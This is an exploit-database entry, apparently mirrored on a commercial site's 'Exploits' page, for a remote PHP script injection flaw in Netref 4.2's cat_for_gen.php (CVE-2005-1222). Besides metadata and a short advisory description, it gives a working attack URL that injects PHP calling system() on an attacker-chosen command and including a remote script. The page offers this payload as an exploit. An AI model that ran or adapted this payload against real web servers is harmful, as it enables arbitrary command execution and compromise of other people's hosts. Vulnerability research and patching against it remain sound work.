[] NeoSense
E X P L O I T S
title author type platform port cve id

Netref 4.2 - 'Cat_for_gen.php' Remote PHP Script Injection

Author: jaguar
type: webapps
platform: php
port: 
date_added: 2005-04-20 
date_updated: 2013-05-15 
verified: 1 
codes: CVE-2005-1222;OSVDB-15717 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/13275/info

A remote PHP script injection vulnerability affects Netref. This issue is due to a failure of the application to sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary PHP script code in the context of an affected Web server. This will facilitate a compromise of the host computer.

http://www.yourdomain.com/[netref_folder]/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></SELECT><?php system($command);include($remote_script)?>
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.